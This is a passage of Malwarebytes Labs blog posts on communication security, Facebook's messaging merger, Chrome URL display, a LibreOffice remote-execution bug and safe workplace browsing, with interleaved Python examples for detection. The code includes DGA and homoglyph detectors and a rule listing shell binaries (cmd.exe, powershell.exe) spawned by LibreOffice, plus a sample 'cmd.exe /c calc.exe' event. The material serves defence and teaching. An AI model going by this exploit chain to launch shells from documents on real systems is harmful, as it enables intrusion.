  • TV and radio broadcasting

Granted, if one of these communication forms fails, part of its traffic can be taken over by another form, but they all have their specific pros and cons that make a durational outage hard to cope with. For example, most smartphones are capable of using both the mobile networks and the Internet, but the latter is limited to when they have Wi-Fi access. When cell phone towers go down, as they did during 9/11, users could send messages via Internet messaging services—at that time, AIM, but today WhatsApp, Facebook Messenger, or other platforms.

Growing importance

In the list I posted earlier, you may have felt that I missed out on letters and postcards, or snail-mail as we often call it. This is because a growing number of companies are keeping us informed through email, their websites, text messages, and other forms of communication that are way faster than postal services. Most companies will still send letters and paper bills if you ask for them, but it’s no longer the default. Our mail delivery services are increasingly starting to resemble package delivery services. They see a growing number of deliveries that require a physical transfer of an object rather than information alone.

Instead, the majority of modern communication is digital.

Securing digital communication

Digital information that needs to be kept from prying eyes and eavesdropping is usually encrypted. To establish secure communication, one may use encrypted mail, crypto-phones, and secure protocols on the Internet. Most of these encryption schemes are strong enough to withstand brute-force attempts at entry—at least for long enough to outlive the usefulness of intercepting the message. Future computer systems like qubit quantum computers, however, may require us to upgrade the encryption strength that we use for these methods.

Breaking the Internet

Because of the way the Internet has grown and become more versatile, the Internet backbone is robust enough to withstand DDoS attacks of a large magnitude. Yet, there have been instances where an entire country, such as North Korea, was taken offline, or where an attack on a major DNS provider caused a serious disruption in the number of sites we were able to visit.

These attacks were targeted at systems that were important for specific parts of the Internet. Nevertheless, they demonstrated that there are weaknesses in the infrastructure that can be exploited to paralyze parts of the Internet, and therefore, parts of our vital communication.

Misinformation and fake news

Another growing problem with predominantly online communication is the spreading of fake news and deliberate misinformation. The most common reasons for spreading misinformation are political and financial gain, as well as attention. The problem has reached a size and impact that caused government bodies like the EU to announce countermeasures. During that process, and due to other influences social media has over its users, many organizations felt the need to hire hordes of moderators who are tasked with keeping the information spread on their platforms as clean and as honest as possible. This still fell short in some instances, such as the dramatic events in Myanmar where Facebook was used as a tool for ethnic cleansing. And these are not the only problems social media are trying to deal with.

Malware and communication

Communication is also a vital part of some types of malware, such as backdoors, Trojans, and especially spyware. After all, what use is it to spy on someone if you are unable to get your hands on the gathered information? Traditional malware communication relies on the use of Command and Control (C&C) servers. But since those servers can be taken down or blocked, malware authors have been looking at rotation systems like Domain Generating Algorithms and some other creative ideas, like using social media and other public platforms.

While you may use social media to stay in contact with family and friends, there are many forms of malware that use those same media for different purposes. Botnets are known to use Twitter as an outlet for spam, fraud, and fake news. But they also use it to send commands to Remote Access Trojans (RATs) that wait for code hidden in memes posted by a particular account.

In addition, malware exploits messenger platforms to communicate instructions. There’s the Goodsender malware, for which threat actors used the Telegram messenger platform to communicate with the malware and send HTTPS-protected instructions. Another well-known phenomenon is the family of Facebook Messenger apps that spread in a worm-like fashion by sending links to friends in an attempt to trick them into installing the app.
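The section above describes the defender's problem: C&C traffic now hides behind domain-generation algorithms and ordinary platforms. The following is an added example, not code from Malwarebytes Labs or any of the malware families named here, that shows the two cheapest signals a network defender can pull out of resolver logs: a burst of NXDOMAIN answers (a DGA probing for whichever domain the operator registered today) and second-level labels that look machine-generated (long, high-entropy, vowel-poor). The log lines are constructed for the example, and the thresholds (`min_len`, `min_entropy`, `max_vowels`, `nx_threshold`) are assumptions to tune against your own traffic.

```python
import math
from collections import Counter, defaultdict
from typing import Dict

# Constructed DNS resolver log lines (sample data for this example, not real telemetry).
# Format: <timestamp> <client_ip> <queried_name> <response_code>
SAMPLE_DNS_LOG = """\
2019-02-08T10:00:01 10.0.0.12 www.malwarebytes.com NOERROR
2019-02-08T10:00:02 10.0.0.12 twitter.com NOERROR
2019-02-08T10:00:03 10.0.0.12 xk3q9vz7lp2m.com NXDOMAIN
2019-02-08T10:00:04 10.0.0.12 q8wz1t0ybn4r.net NXDOMAIN
2019-02-08T10:00:05 10.0.0.12 m2c7hjk9vx1p.org NXDOMAIN
2019-02-08T10:00:06 10.0.0.12 api.telegram.org NOERROR
2019-02-08T10:00:07 10.0.0.33 mail.example.org NOERROR
2019-02-08T10:00:08 10.0.0.33 b7f2kd9qzt3w.com NXDOMAIN
"""


def shannon_entropy(text: str) -> float:
    """Bits of entropy per character; random-looking labels score high."""
    if not text:
        return 0.0
    counts = Counter(text)
    n = len(text)
    return -sum(c / n * math.log2(c / n) for c in counts.values())


def second_level_label(domain: str) -> str:
    """Label left of the TLD: 'www.example.com' -> 'example'.
    Multi-part public suffixes (co.uk) need the Public Suffix List in a
    real deployment; kept simple for the example."""
    parts = domain.lower().strip(".").split(".")
    return parts[-2] if len(parts) >= 2 else parts[0]


def vowel_ratio(label: str) -> float:
    """Human-chosen names contain vowels; DGA output usually does not."""
    if not label:
        return 0.0
    return sum(ch in "aeiou" for ch in label) / len(label)


def is_dga_like(domain: str, min_len: int = 10, min_entropy: float = 3.0,
                max_vowels: float = 0.25) -> bool:
    """Heuristic: long, high-entropy, vowel-poor labels look machine-generated.
    Thresholds are assumptions chosen for this example. Note that entropy
    alone is not enough: 'malwarebytes' scores above 3 bits but has plenty
    of vowels, which is why all three conditions must hold."""
    label = second_level_label(domain)
    return (len(label) >= min_len
            and shannon_entropy(label) >= min_entropy
            and vowel_ratio(label) <= max_vowels)


def analyze_dns_log(log_text: str, nx_threshold: int = 3) -> Dict[str, dict]:
    """Per-client summary: NXDOMAIN count, DGA-like names, and an alert flag.
    A burst of NXDOMAIN answers from one host is the classic footprint of a
    DGA walking through candidate C&C domains until one resolves."""
    stats = defaultdict(lambda: {"nxdomain": 0, "dga_like": [], "alert": False})
    for line in log_text.splitlines():
        parts = line.split()
        if len(parts) != 4:
            continue  # skip malformed lines rather than crash the pipeline
        _ts, client, name, rcode = parts
        entry = stats[client]
        if rcode == "NXDOMAIN":
            entry["nxdomain"] += 1
        if is_dga_like(name):
            entry["dga_like"].append(name)
    for entry in stats.values():
        entry["alert"] = entry["nxdomain"] >= nx_threshold or bool(entry["dga_like"])
    return dict(stats)


if __name__ == "__main__":
    for client, entry in analyze_dns_log(SAMPLE_DNS_LOG).items():
        print(client, entry)
```

Run against the constructed log, 10.0.0.12 is flagged on both signals and 10.0.0.33 on the label heuristic alone. Neither signal catches the Twitter or Telegram channels the article mentions, since those are legitimate domains; for that class of C&C you have to look at who is posting what, not at the resolver.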

Social media countermeasures

While social media companies are struggling with their public reputation these days, they at least seem ready to take baby steps forward in tightening up security—whether from political pressure or self-awareness. At an event in Brussels, Nick Clegg, Facebook’s head of global public relations, stated:

We are at the start of a discussion which is no longer about whether social media should be regulated, but how it should be regulated. We recognize the value of regulation, and we are committed to working with policymakers to get it right.

Working out the “how” could turn into a long-winded discussion, however. Maybe the rumors about a space laser communications system represent a step in the right direction. In theory, such a system could be used to improve security.

Better communication results in better security

Having all the facts helps us to improve security. Making sure that this information reaches the people that need it is a matter of effective communication strategy. And in some cases, it may be just as important that the information is not communicated so that it doesn’t fall into the wrong hands.

The National Intelligence Strategy released in January 2019 by the Office of the Director of National Intelligence states:

Nearly all information, communication networks, and systems will be at risk for years to come.

Therefore, an important part of any communication strategy must be to recognize the risk and integrate the proper tools, such as end-to-end encryption or intel on platforms known to be used by cybercriminals. The National Intelligence Strategy goes on to say that they’ll be “harnessing the full talent and tools of the IC [Intelligence Community] by bringing the right information, to the right people, at the right time.”

Cyberattacks on communication infrastructure

A pretty bizarre method of abusing communication happened when a family was scared into believing there was an ongoing nuclear attack, as some prankster accessed their Nest camera to issue realistic warnings about missiles heading to the US from North Korea.

More worrying is the trend for ransomware authors (especially groups using SamSam) to take aim at cities and small government bodies with the goal of shutting down infrastructure, including communications. Taking down a city website, as happened in Atlanta, cripples an important medium for disseminating information to citizens, not to mention that the costs of getting everything back online were absorbed by taxpayer money that could have been better spent on other services.

Information is crucial

Important decisions may be postponed when the person or body that is supposed to make that decision is unable to gather the information necessary. Communications are also a vital part of some malware infections. Perhaps organizations can use some of the ingenious methods malware authors have thought up when looking for ways to make vital lines of communication more robust. Redundancy is a good thing when it allows us to use multiple methods and networks to transmit the same information. On the other hand, it also enlarges the attack surface when it comes to sharing confidential information.

This does have an upside for the free flow of information. Because of all the communication options out there, some regimes are having an increasingly difficult time shielding their population from information they would rather sweep under the carpet. This hasn’t stopped some, like China with its Great Firewall, from trying, though.

Communication is everywhere

Communication is truly always available to nearly everyone that wants it in the western world, and this readiness—and the danger that lurks with it—may shape how our generation is viewed far into the future. This may be the era when communication both flourished to its true potential, and reached its limits. After all, pitfalls are inherent when technology develops faster than regulation can keep up.

Maybe the developments we are seeing now are just another step forward for the eventual better regulation of communication, though I’m convinced it will not be the last step regulators need to take. In fact, 5G is already waiting around the corner to add another level in speed and bandwidth to an already connected society. Let’s see how this new technology impacts an already complex tapestry of communication triumphs and failures.

The post Compromising vital infrastructure: communication appeared first on Malwarebytes Labs.


Merging Facebook Messenger, WhatsApp, and Instagram: a technical, reputational hurdle

Malware Bytes Security - Thu, 02/07/2019 - 11:53am

Secure messaging is supposed to be just that—secure. That means no backdoors, strong encryption, private messages staying private, and, for some users, the ability to securely communicate without giving up tons of personal data.

So, when news broke that scandal-ridden, online privacy pariah Facebook would expand secure messaging across its Messenger, WhatsApp, and Instagram apps, a broad community of cryptographers, lawmakers, and users asked: Wait, what?

Not only is the technology difficult to implement, the company implementing it has a poor track record with both user privacy and online security.

On January 25, the New York Times reported that Facebook CEO Mark Zuckerberg had begun plans to integrate the company’s three messaging platforms into one service, allowing users to potentially communicate with one another across its separate mobile apps. According to the New York Times, Zuckerberg “ordered that the apps all incorporate end-to-end encryption.”

The initial response was harsh.

Abroad, Ireland’s Data Protection Commission, which regulates Facebook in the European Union, immediately asked for an “urgent briefing” from the company, warning that previous data-sharing proposals raised “significant data protection concerns.”

In the United States, Democratic Senator Ed Markey for Massachusetts said in a statement: “We cannot allow platform integration to become privacy disintegration.”

Cybersecurity technologists swayed between cautious optimism and just plain caution.

Some professionals focused on the clear benefits of enabling end-to-end encryption across Facebook’s messaging platforms, emphasizing that any end-to-end encryption is better than none.

Former Facebook software engineer Alec Muffett, who led the team that added end-to-end encryption to Facebook Messenger, said on Twitter that the integration plan “clearly maximises the privacy afforded to the greatest [number] of people and is a good idea.”

Others questioned Facebook’s motives and reputation, scrutinizing the company’s established business model of hoovering up mass quantities of user data to deliver targeted ads.

Johns Hopkins University Associate Professor and cryptographer Matthew Green said on Twitter that “this move could potentially be good or bad for security/privacy. But given recent history and financial motivations of Facebook, I wouldn’t bet my lunch money on ‘good.’”

On January 30, Zuckerberg confirmed the integration plan during a quarterly earnings call. The company hopes to complete the project either this year or in early 2020.

It’s going to be an uphill battle.

Three applications, one bad reputation

Merging three separate messaging apps is easier said than done.

In a phone interview, Green said Facebook’s immediate technological hurdle will be integrating “three different systems—one that doesn’t have any end-to-end encryption, one where it’s default, and one with an optional feature.”

Currently, the messaging services across WhatsApp, Facebook Messenger, and Instagram have varying degrees of end-to-end encryption. WhatsApp provides default end-to-end encryption, whereas Facebook Messenger provides optional end-to-end encryption if users turn on “Secret Conversations.” Instagram provides no end-to-end encryption in its messaging service.

Further, Facebook Messenger, WhatsApp, and Instagram all have separate features—like Facebook Messenger’s ability to support more than one device and WhatsApp’s support for group conversations—along with separate desktop or web clients.

Green said to imagine someone using Facebook Messenger’s web client—which doesn’t currently support end-to-end encryption—starting a conversation with a WhatsApp user, where encryption is set by default. These lapses in default encryption, Green said, could create vulnerabilities. The challenge is in pulling together all those systems with all those variables.

“First, Facebook will have to likely make one platform, then move all those different systems into one somewhat compatible system, which, as far as I can tell, would include centralizing key servers, using the same protocol, and a bunch of technical development that has to happen,” Green said. “It’s not impossible. Just hard.”

But there’s more to Facebook’s success than the technical know-how of its engineers. There’s also its reputation, which, as of late, portrays the company as a modern-day data baron, faceplanting into privacy failure after privacy failure.

After the 2016 US presidential election, Facebook refused to call the surreptitious collection of 50 million users’ personal information a “breach.” When brought before Congress to testify about his company’s role in a potential international disinformation campaign, Zuckerberg deflected difficult questions and repeatedly claimed the company does not “sell” user data to advertisers. But less than one year later, a British parliamentary committee released documents that showed how Facebook gave some companies, including Airbnb and Netflix, access to its platform in exchange for favors—no selling required.

Five months ago, Facebook’s Onavo app was booted from the Apple App Store for gathering app data, and early this year, Facebook reportedly paid users as young as 13-years-old to install the “Facebook Research” app on their own devices, an app intended strictly for Facebook employee use. Facebook pulled the app, but Apple had extra repercussions in mind: It removed Facebook’s enterprise certificate, which the company relied on to run its internal developer apps.

These repeated privacy failures are enough for some users to avoid Facebook’s end-to-end encryption experiment entirely.

“If you don’t trust Facebook, the place to worry is not about them screwing up the encryption,” Green said. “They want to know who’s talking to who and when. Encryption doesn’t protect that at all.”

If not Facebook, then who?

Reputationally, there are at least two companies that users look to for both strong end-to-end encryption and strong support of user privacy and security—Apple and Signal, which respectively run the iMessage and Signal Messenger apps.

In 2013, Open Whisper Systems developed the Signal Protocol. This encryption protocol provides end-to-end encryption for voice calls, video calls, and instant messaging, and is implemented by WhatsApp, Facebook Messenger, Google’s Allo, and Microsoft’s Skype to varying degrees. Journalists, privacy advocates, cryptographers, and cybersecurity researchers routinely praise Signal Messenger, the Signal Protocol, and Open Whisper Systems.

“Use anything by Open Whisper Systems,” said former NSA defense contractor and government whistleblower Edward Snowden.

“[Signal is] my first choice for an encrypted conversation,” said cybersecurity researcher and digital privacy advocate Bruce Schneier.

Separately, Apple has proved its commitment to user privacy and security through statements made by company executives, updates pushed to fix vulnerabilities, and legal action taken in US courts.

In 2016, Apple fought back against a government request that the company design an operating system capable of allowing the FBI to crack an individual iPhone. Such an exploit, Apple argued, would be too dangerous to create. Earlier last year, when an American startup began selling iPhone-cracking devices—called GrayKey—Apple fixed the vulnerability through an iOS update.

Repeatedly, Apple CEO Tim Cook has supported user security and privacy, saying in 2015: “We believe that people have a fundamental right to privacy. The American people demand it, the constitution demands it, morality demands it.”

But even with these sterling reputations, the truth is, cybersecurity is hard to get right.

Last year, cybersecurity researchers found a critical vulnerability in Signal’s desktop app that allowed threat actors to obtain users’ plaintext messages. Signal’s developers fixed the vulnerability within a reported five hours.

Last week, Apple’s FaceTime app, which encrypts video calls between users, suffered a privacy bug that allowed threat actors to briefly spy on victims. Apple fixed the bug after news of the vulnerability spread.

In fact, several secure messaging apps, including Telegram, Viber, Confide, Allo, and WhatsApp have all reportedly experienced security vulnerabilities, while several others, including Wire, have previously drawn ire because of data storage practices.

But vulnerabilities should not scare people from using end-to-end encryption altogether. On the contrary, they should spur people into finding the right end-to-end encrypted messaging app for themselves.

No one-size-fits-all, and that’s okay

There is no such thing as a perfect, one-size-fits-all secure messaging app, said Electronic Frontier Foundation Associate Director of Research Gennie Gebhart, because there’s no such thing as a perfect, one-size-fits-all definition of secure.

“In practice, for some people, secure means the government cannot intercept their messages,” Gebhart said. “For others, secure means a partner in their physical space can’t grab their device and read their messages. Those are two completely different tasks for one app to accomplish.”

In choosing the right secure messaging app for themselves, Gebhart said people should ask what they need and what they want. Are they worried about governments or service providers intercepting their messages? Are they worried about people in their physical environment gaining access to their messages? Are they worried about giving up their phone number and losing some anonymity?

In addition, it’s worth asking: What are the risks of an accident, like, say, mistakenly sending an unencrypted message that should have been encrypted? And, of course, what app are friends and family using?

As for the constant news of vulnerabilities in secure messaging apps, Gebhart advised not to overreact. The good news is, if you’re reading about a vulnerability in a secure messaging tool, then the people building that tool know about the vulnerability, too. (Indeed, developers fixed the majority of the security vulnerabilities listed above.) The best advice in that situation, Gebhart said, is to update your software.

“That’s number one,” Gebhart said, explaining that, though this line of defense is “tedious and maybe boring,” sometimes boring advice just works. “Brush your teeth, lock your door, update your software.”

Cybersecurity is many things. It’s difficult, it’s complex, and it’s a team sport. That team includes you, the user. Before you use a messenger service, or go online at all, remember to follow the boring advice. You’ll better secure yourself and your privacy.

The post Merging Facebook Messenger, WhatsApp, and Instagram: a technical, reputational hurdle appeared first on Malwarebytes Labs.


Google Chrome announces plans to improve URL display, website identity

Malware Bytes Security - Wed, 02/06/2019 - 1:16pm

“Unreadable gobbledygook” is one way to describe URLs as we know them today, and Google has been attempting to redo their look for years. In its latest move to improve how Chrome displays the URL in its omnibox (the address bar)—a move the company hopes other browsers will follow—Google’s Chrome team has made public two projects that push in this direction.

First, they launched Trickuri (pronounced as “trickery”) in time for a talk they were scheduled to present at the 2019 Enigma Conference. Second, they’re working on creating warnings of potentially phishy URLs for Chrome users.

Watch out! Some trickery and phishing ahead

Trickuri is an open-source tool where developers can test whether their applications display URLs accurately and consistently in different scenarios. The new Chrome warnings, on the other hand, are still in internal testing. Emily Stark, Google Chrome’s Usability Security Lead, confesses that the challenge lies in creating heuristic rules that appropriately flag malicious URLs while avoiding false positives.

“Our heuristics for detecting misleading URLs involve comparing characters that look similar to each other and domains that vary from each other just by a small number of characters,” Stark said in an interview with WIRED. “Our goal is to develop a set of heuristics that pushes attackers away from extremely misleading URLs, and a key challenge is to avoid flagging legitimate domains as suspicious. This is why we’re launching this warning slowly, as an experiment.”

These efforts are part of the team’s current focus, which is the detection and flagging of seemingly dubious URLs.
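Stark's description of the heuristics (characters that look alike, and domains a few edits away from a known one) maps onto two well-known techniques: a "skeleton" transform that replaces confusable characters with the ASCII letter they resemble, and an edit-distance comparison against an allow-list. The code below is an added example written for this article, not Chrome's implementation or Trickuri; it assumes a small constructed list of protected domains and a deliberately tiny confusables table (Unicode's confusables.txt is the full one). It also shows the third trick a URL display has to defeat, a legitimate name buried in a subdomain of an attacker's domain, by classifying on the registrable domain rather than the leftmost label a user reads first.

```python
import unicodedata
from urllib.parse import urlsplit
from typing import Dict, List, Optional

# Constructed allow-list for the example (not from the article).
PROTECTED_DOMAINS = ["google.com", "paypal.com", "malwarebytes.com"]

# Pairs and characters that render like another ASCII glyph. Deliberately
# tiny; the trade-off Stark describes is visible already: "rn" -> "m" will
# also rewrite honest names such as "modern".
MULTI_CONFUSABLES = {"rn": "m", "vv": "w"}
SINGLE_CONFUSABLES = str.maketrans({
    "0": "o", "1": "l", "3": "e", "5": "s",
    "\u0430": "a", "\u0435": "e", "\u043e": "o", "\u0440": "p",  # Cyrillic а е о р
    "\u0441": "c", "\u0445": "x", "\u0443": "y",                 # Cyrillic с х у
})


def skeleton(host: str) -> str:
    """Canonical 'what it looks like' form of a host name."""
    s = unicodedata.normalize("NFKC", host).lower()
    for pair, single in MULTI_CONFUSABLES.items():
        s = s.replace(pair, single)
    return s.translate(SINGLE_CONFUSABLES)


def levenshtein(a: str, b: str) -> int:
    """Edit distance: 'gooogle' vs 'google' is 1."""
    prev = list(range(len(b) + 1))
    for i, ca in enumerate(a, 1):
        cur = [i]
        for j, cb in enumerate(b, 1):
            cur.append(min(prev[j] + 1, cur[j - 1] + 1, prev[j - 1] + (ca != cb)))
        prev = cur
    return prev[-1]


def registrable_domain(host: str) -> str:
    """Last two labels: 'google.com.evil-example.net' -> 'evil-example.net'.
    This is the part worth emphasizing in a URL display. (Multi-part public
    suffixes such as co.uk need the Public Suffix List; simplified here.)"""
    labels = host.strip(".").split(".")
    return ".".join(labels[-2:])


def classify_url(url: str, protected: List[str] = PROTECTED_DOMAINS,
                 max_distance: int = 2) -> Dict[str, Optional[str]]:
    """Verdicts: legitimate (exact registrable match), homoglyph (identical
    after skeletonizing), typosquat (within max_distance edits), or unknown."""
    host = urlsplit(url).hostname or ""
    reg = registrable_domain(host)
    sk = skeleton(reg)
    verdict, match, best = "unknown", None, None
    for good in protected:
        if reg == good:
            return {"host": host, "registrable": reg, "verdict": "legitimate", "match": good}
        if sk == skeleton(good):
            return {"host": host, "registrable": reg, "verdict": "homoglyph", "match": good}
        d = levenshtein(sk, skeleton(good))
        if d <= max_distance and (best is None or d < best):
            verdict, match, best = "typosquat", good, d
    return {"host": host, "registrable": reg, "verdict": verdict, "match": match}


if __name__ == "__main__":
    for u in ["https://accounts.google.com/signin", "http://paypa1.com/login",
              "http://gooogle.com/", "http://google.com.evil-example.net/",
              "http://p\u0430ypal.com/"]:
        print(classify_url(u))
```

The last sample URL contains a Cyrillic "а" that is pixel-identical to the Latin one in most fonts; after skeletonizing it collapses onto the protected name. The subdomain case comes back as "unknown" rather than "legitimate", which is the right answer from a warning heuristic: it is not on the allow-list, and a display that elides everything but the registrable domain would show the user "evil-example.net".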

Google Chrome’s bigger goal

The URL is used to identify entities online. It is the first place users look to assess if they are in a good place or not. But not everyone knows the components that comprise a URL, much less what they mean in the syntax. Google’s push for website owners to use HTTPS has rippled across browser developers and consequently changed user preferences to favor such sites. In effect, by pushing HTTPS, Google changed the game to give the user a generally safer online experience.

However, Google wants to go beyond this and is set on raising user awareness of the relevant parts of the URL so that users can make quick security decisions. As a result, the team is refining Chrome to present these parts while keeping the irrelevant gibberish out of users’ view.

In a separate interview with WIRED, Adrienne Porter Felt, Google Chrome’s Engineering Manager, had this to say about how users perceive the URL: “People have a really hard time understanding URLs. They’re hard to read, it’s hard to know which part of them is supposed to be trusted, and in general I don’t think URLs are working as a good way to convey site identity. So we want to move toward a place where web identity is understandable by everyone—they know who they’re talking to when they’re using a website and they can reason about whether they can trust them. But this will mean big changes in how and when Chrome displays URLs. We want to challenge how URLs should be displayed and question it, as we’re figuring out the right way to convey identity.”

While these may all sound good, no one—not even Google—knows what the final, new URL will look like at this point.

A brief timeline of Google’s efforts in changing the URL

Below is a brief timeline of attempts Google has made to change how Chrome displays the URL in the omnibox:

“…it just raises too many questions.”

With Google’s new effort, how will it affect redirection schemes? SEO? Shortened URLs?

Will this, in time, affect the behavior of new Internet users entering URLs in the address bar? For example, what if they don’t know that certain URL elements are (by default) elided but should now be typed in (such as entering ‘www’) to go to their desired destination? Will they understand the meaning of .com or .org if these elements are erased from view?

How can web developers, business owners, and consumers prepare themselves for these URL changes?

Right now, there’s more uncertainty than there are answers, as Google admits there is still a lot of work to be done. And based on the tone of several spokespersons in interviews, the company also expects some pushback and a degree of controversy that may arise from their efforts. Change is never easy.

Let’s keep an eye on this URLephant in the room, shall we? And let’s also keep giving feedback and raising questions. After all, this is Google’s way of keeping Chrome users away from URL-based threats. If changes are not implemented with thoughtful precision, then threat actors can easily find a way around them, or at least bank on the confusion resulting from a poor rollout of new processes.

While the future of URLs is still murky, one thing’s for certain: the bad guys know how to exploit weaknesses. So we hope, for Google and all its users’ sake, changes in URL display only serve to strengthen everyone’s security posture online.

Further reading:


The post Google Chrome announces plans to improve URL display, website identity appeared first on Malwarebytes Labs.


New critical vulnerability in open-source office suites

Malware Bytes Security - Wed, 02/06/2019 - 12:16pm

A great number of attack techniques these days are using Microsoft Office documents to distribute malware. In recent years, there has been serious development on document exploit kit builders, not to mention the myriad of tricks that red-teamers have come up with to bypass security solutions.

In contrast to drive-by downloads that require no user interaction, document-based attacks usually incorporate some kind of social engineering component. From being lured into opening up an attachment to enabling the infamous macros, attackers are using all sorts of themes and spear phishing techniques to infect their victims.

While Microsoft Office gets all of the attention, other productivity software suites have been exploited before. We recall the Hangul Office Suite, which is popular in South Korea and was used by threat groups in targeted attacks.

Today we look at a vulnerability in LibreOffice, the free and open-source office suite, and OpenOffice (now Apache OpenOffice) available for Windows, Mac, and Linux. The bug (CVE-2018-16858) was discovered by Alex Inführ, who responsibly disclosed it and then published the results with an accompanying proof of concept on his blog.

Proof of concept code exploiting the vulnerability and launching the calculator

An attacker could take advantage of this bug to execute remote code, which could lead to compromising the system. The flaw uses a mouseover event, which means the user would have to be tricked into placing their mouse over a link within the document. This triggers execution of a Python file (installed with LibreOffice) and allows parameters to be passed and executed.

We tested several proofs of concept shared by John Lambert. The process flow typically goes like this: soffice.exe -> soffice.bin -> cmd.exe -> calc.exe
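That process flow is the detection opportunity: an office suite has no business spawning a command shell, whatever document trick got it there. The following is an added example, not Malwarebytes' detection logic or anything from Inführ's or Lambert's proofs of concept, that walks Sysmon-style process-creation events and flags a shell whose ancestry passes through the LibreOffice binaries named in the article. The events are constructed sample data; the `OFFICE_IMAGES` and `SHELL_IMAGES` sets are assumptions a practitioner would extend (other office suites, script hosts) for their own environment.

```python
from typing import Dict, List

# Constructed process-creation events in a Sysmon-like shape (not real telemetry).
SAMPLE_EVENTS = [
    {"pid": 100, "ppid": 1,   "image": r"C:\Windows\explorer.exe",
     "cmdline": "explorer.exe"},
    {"pid": 200, "ppid": 100, "image": r"C:\Program Files\LibreOffice\program\soffice.exe",
     "cmdline": "soffice.exe invoice.odt"},
    {"pid": 201, "ppid": 200, "image": r"C:\Program Files\LibreOffice\program\soffice.bin",
     "cmdline": "soffice.bin invoice.odt"},
    {"pid": 300, "ppid": 201, "image": r"C:\Windows\System32\cmd.exe",
     "cmdline": "cmd.exe /c calc.exe"},
    {"pid": 301, "ppid": 300, "image": r"C:\Windows\System32\calc.exe",
     "cmdline": "calc.exe"},
    {"pid": 400, "ppid": 100, "image": r"C:\Windows\System32\cmd.exe",
     "cmdline": "cmd.exe"},   # shell opened by the user from Explorer: benign
]

# Assumed sets for the example; extend for other suites and script hosts.
OFFICE_IMAGES = {"soffice.exe", "soffice.bin"}
SHELL_IMAGES = {"cmd.exe", "powershell.exe", "python.exe", "wscript.exe"}


def basename(path: str) -> str:
    """Case-insensitive file name from a Windows or POSIX path."""
    return path.replace("\\", "/").rsplit("/", 1)[-1].lower()


def ancestry(by_pid: Dict[int, dict], pid: int, max_depth: int = 8) -> List[str]:
    """Image names from the oldest known ancestor down to pid itself.
    max_depth guards against cyclic or recycled PIDs in real telemetry."""
    chain = []
    while pid in by_pid and len(chain) < max_depth:
        event = by_pid[pid]
        chain.append(basename(event["image"]))
        pid = event["ppid"]
    return list(reversed(chain))


def detect_office_spawned_shells(events: List[dict]) -> List[dict]:
    """Alert on every shell whose process ancestry contains an office binary.
    The returned chain is trimmed to start at that office process, e.g.
    ['soffice.exe', 'soffice.bin', 'cmd.exe']."""
    by_pid = {e["pid"]: e for e in events}
    alerts = []
    for event in events:
        if basename(event["image"]) not in SHELL_IMAGES:
            continue
        chain = ancestry(by_pid, event["pid"])
        office_hits = [i for i, name in enumerate(chain[:-1]) if name in OFFICE_IMAGES]
        if office_hits:
            alerts.append({"pid": event["pid"],
                           "chain": chain[office_hits[0]:],
                           "cmdline": event["cmdline"]})
    return alerts


if __name__ == "__main__":
    for alert in detect_office_spawned_shells(SAMPLE_EVENTS):
        print(alert["pid"], " -> ".join(alert["chain"]), "|", alert["cmdline"])
```

On the sample events only PID 300 is reported, with the chain soffice.exe -> soffice.bin -> cmd.exe and the command line that launches calc.exe; the user's own shell under Explorer is left alone. Because the rule keys on lineage rather than on the mouseover trick itself, it also holds once the vulnerability is patched: a legitimate document should never need to reach a shell.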

The vulnerability has been patched in LibreOffice but not in Apache OpenOffice—yet. Malwarebytes users were already protected against it without the need for a detection update.

Time will tell if this vulnerability ends up being used in the wild. It’s worth noting that not everyone uses Microsoft Office, and threat actors could consider it for targeting specific victims they know may be using open-source productivity software.

The post New critical vulnerability in open-source office suites appeared first on Malwarebytes Labs.


How to browse the Internet safely at work

Malware Bytes Security - Tue, 02/05/2019 - 11:00am

This Safer Internet Day, we teamed up with ethical hacking and web application security company Detectify to provide security tips for both workplace Internet users and web developers. This article is aimed at employees of all levels. If you’re a programmer looking to create secure websites, visit Detectify’s blog to read their guide to HTTP security headers for web developers.

More and more businesses are becoming security- and privacy-conscious—as they should be. Whereas in years past IT departments’ pleas for a bigger cybersecurity budget fell on deaf ears, this year things have started looking up. Indeed, there is nothing quite like a lengthening string of security breaches to grab people’s—and executives’—attention.

Purely reacting to events is a terrible approach, and organizations that handle and store sensitive client information have learned this the hard way. It not only puts businesses in constant firefighting mode, but is also a sign that their current cybersecurity posture may be inadequate and in need of proper assessment and improvement.

Part of improving an organization’s cybersecurity posture has to do with increasing its employees’ awareness. Being their first line of defense, it’s only logical to educate users about cybersecurity best practices, as well as the latest threats and trends. In addition, by providing users with a set of standards to adhere to, and maintaining those standards, organizations can create an intentional culture of security.

Developing these training regimens requires a lot of time, effort, and perhaps a metaphorical arm and a leg. Do not be discouraged. Companies can start improving their security posture now by sharing with employees a helpful and handy guide on how to safely browse the Internet at work, whether on a desktop, laptop, or mobile phone.

Safe Internet browsing at work: a guideline

Take note that some of what’s listed below may already be in your company’s Employee Internet Security Policy, but in case you don’t have such a policy in place (yet), the list below is a good starting point.

Make sure that the browser(s) installed on your work machine are up to date. The IT department may be responsible for updating employee operating systems (OSes) on remote and in-house devices, as well as other business-critical software. It may not be their job, however, to update software you’ve installed yourself, such as your preferred browser. The number one rule when browsing the Internet is to make sure that the browser is up to date. Threats such as malicious websites, malvertising, and exploit kits can find their way in through vulnerabilities that out-of-date browsers leave behind.

While you’re at it, updating other software on your work devices keeps browser-based threats from finding other ways onto your system. If IT doesn’t already cover this, update your file-compressor, anti-malware program, productivity apps, and even media players. It’s a tedious and often time-consuming task, but—shall we say—updating is part of owning software. You can use a software updater program to make the ordeal more manageable. Just don’t forget to update your updater, too.

If you have software programs you no longer use or need, uninstall them. Let’s be practical: There’s really no reason to keep software if you’ve stopped using it or if it’s just part of bloatware that came with your computer. It’s also likely that, since you’re not using that software, it’s incredibly outdated, making it an easy avenue for the bad guys to exploit. So do yourself a favor and get rid of it. That’s one less program to update.

Know thy browser and make the most of its features. Modern-day browsers like Brave, Vivaldi, and Microsoft Edge have launched quite a bit differently than their predecessors. Other than their appealing customization schemes, they also boast of being secure (or private) by default. By contrast, browsers that have been around for a long time continue to improve on these aspects, as well as their versatility and performance.

Regardless of which browser you use, make it a point to review its settings (if you haven’t already) and configure them with security and privacy in mind. The US-CERT has more detailed information on how to secure browsers, which you can read through here.

